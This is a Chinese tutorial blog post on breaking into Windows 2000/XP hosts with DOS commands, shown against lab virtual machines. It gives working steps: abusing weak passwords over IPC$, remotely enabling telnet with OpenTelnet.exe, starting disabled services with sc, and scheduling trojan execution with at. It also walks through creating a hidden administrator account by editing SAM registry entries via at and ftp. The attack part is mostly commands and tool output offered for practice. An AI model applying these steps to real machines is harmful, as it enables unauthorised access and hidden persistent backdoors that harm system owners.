dos下常用的入侵

一,dos命令入侵
      
      入侵2000 ;
         1.扫弱口令(怎么扫后面会讲到) 2.建ipc非空连接 3.映射对方硬盘,复制木马(可以直接用copy命令) 4.net time 命令查询远程主机时间 5. at 命令指定时间运行木马,大家自己结合前面讲到的实验下
      
        入侵xp:(2000也适用)
         1.扫弱口令 2.开远程主机telnet服务 3.telnet到远程主机 4.执行命令下载木马或添加隐藏账户
     
由于xp的虚拟机老是出错,就用2000做实验了

开启telnet服务的方法:

opentelnet.exe ,远程开telnet的工具
      
命令:OpenTelnet.exe
//server username password 验证方式 端口号

验证方式从0到2.一般1成功的几率比较大,端口号自己定了

例如:OpenTelnet.exe
//192.168.1.1 administrator "" 1 23

就是这个工具,放到c盘去,一会好执行命令

下面我们来演示下

1.ping一下对方ip,简单探测下对方的系统类型,这里返回值是128,判断是2000或xp,我们已经扫描到它的用户名和密码,可以建个ipc连接来判断是不是对的,实际中可以省略这一步,直接开telnet,这里为了让大家熟悉下命令
net use
//192.168.174.129/ipc$ "longyu" /user:administrator
命令成功完成,下面我们先在2000中看下他的服务,没有开teknet,禁用掉了,如果这时候我们telnet,看下返回信息
下面我们就远程打开它的telnet服务

OpenTelnet.exe //192.168.174.129 administrator "longyu" 1 23

Connecting //192.168.174.129...Canncel Successfully!
Successfully! 连接成功

NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

Starting telnet service... 开启服务
telnet service is started successfully! telnet service is running!

BINGLE!!!Yeah!!
Telnet Port is 23. You can try:"telnet ip 23", to connect the server!
Disconnecting server...Successfully! 端口号是 23

下面我们再来连下,这样就得到了对方的cmdshell,想做什么都可以了。

sc.exe 系统自带开启服务工具,本地开启telnet服务(有时候会用到)
我们用这个工具在本地开启telnet服务有时候也会用到开启at服务
在使用sc命令之前必须已经得到对方的cmd shell,也就是已经可以执行命令
        
在cmd下可有两种方法打开,net和sc,net用于打开没有被禁用的服务,语法是:
      net start 服务名
      net stop 服务名
前面已经用 关掉系统防火墙举过例子了

用sc可打开被禁用的服务,语法是:
sc config 服务名 start= demand     //手动
sc config 服务名 start= auto       //自动     
sc config 服务名 start= disabled   //禁用
sc start   服务名
sc stop    服务名
大家自己看看了

注:
1)服务名不一定是你在服务面板看到的那个名,例如,你要打开被禁用的telnet服务,
sc config telnet start= auto,报错:[SC] OpenService FAILED 1060,因为telnet的服务名不是telnet而是tlntsvr,

sc config tlntsvr start= auto

就OK了,在服务面板里查看telnet属性,从可执行文件的路径里可看到服务程序名,即命令中的服务名。  

2)start=后面有空格,少了就有错
网上还有一个开telnet的脚本,效果也不错,大家可以去试试。
下面我们先禁用在开下,需要先注销,现在telnet还是开启的呢,注销好了
我们再 看下,没有开启telnet
看到效果了吧。开telnet先将这么多了

关于虚拟机XP的ipc入侵遇到的问题很多,有时候只能用2000来做实验,不只是远程主机一些设置的原因,自己的主机也要设置好,哪里做的不好还请多多担待,后面会给大家补一个XP ipc入侵的实例。

二 ,dos命令添加超级隐藏账户 (xp下适用)

        用到的命令:telnet ,net user ,at,
      
     系统用户的各个键值都在 注册表 :HKEY_LOCAL_MACHINE/SAM/SAM/ ,这一项里,但是普通用户是没有权限查看和修改的,必须先把权限提升一下才可以,
开始,运行
这里我们是运行的regedt32,   而不是regedit 在本机演示下修改权限。如果能用3389连到对方也可以这样改。

但是现在我们是命令行模式下,是不可能在远程电脑上直接修改权限的,所以这里我们用at命令帮助我们提升权限,前面说过at命令是系统权限的,注册表对此是没有限制的,所以就用它了。

        第一步,telnet 到对方,得到cmd shell
       这里用本机 telnet xp ,然后添加一个隐藏账户
     telnet 192.168.174.128
     好了,进到xp中了  
        第二步。sc开启at服务,先看下at服务开了没有,就是看Task Scheduler ,
     好,我们来开下
                     
                  sc 开启at服务:
                       sc config Schedule start= DEMAND
                       net start schedule
好了,已经启动了

        第三步,执行命令添加隐藏账户

net user router$ longyu /add   添加用户名为router$ 密码为longyu的隐藏账户
(隐藏账户就是最后有$的账户,在dos命令下是看不到的,倒是在用户管理下可以看到)

net localgroup Administrators router$ /add 将router$加入到管理组

查询时间 net time //127.0.0.1

at 16:43 C:/WINDOWS/regedit.exe /e longyu.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/account/users/   导出注册表项

这里一定要是一整行复制过去,要不会出错,导出的longyu.reg 在 windows文件夹里,好了,我们看下去。说错了,不好意思。在system32里面

本机搭建ftp服务器。时间到了之后将导出的注册表项用ftp复制到本机
看下有没有

下面就是我们手工编辑了
将HKEY_LOCAL_MACHINE/SAM/SAM/Domains/account/users/导出为longyu.reg,用记事本打开文件进行编辑,将超级用户administration对应的项000001F4下的键"F"的值复制(一般都是这一个),并覆盖router$对应的项下的键的值。这样就算修改好了,

在命令行下执行net user router$ /del将用户router$ 删除

我们还是先把修改好的reg文件上传过去

ftp命令 get 到远程主机c盘
然后再将修改后的reg文件双击导入。这里我们还是用命令导入吧
at 16:56 C:/WINDOWS/regedit.exe /s longyu2.reg
查下时间,这里大家选择时间的时候一定要充裕,多一点没关系,最好不要少了
等会用net user router$ 看下,再用telnet登录下看看成功吗 好了,看下

管理里面看不到,但是确实存在的。登录成功
这样就建好了,看下效果。

此方法适用于xp,在2000或2003下会在管理的用户栏里看到,不是很完美。
在后面的服务器入侵里面还会讲到克隆管理员帐号,比这个方法要好,这里主要还是让大家熟悉些命令。

 

好了,这节课就到这里,还是多多练习吧,拜拜。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值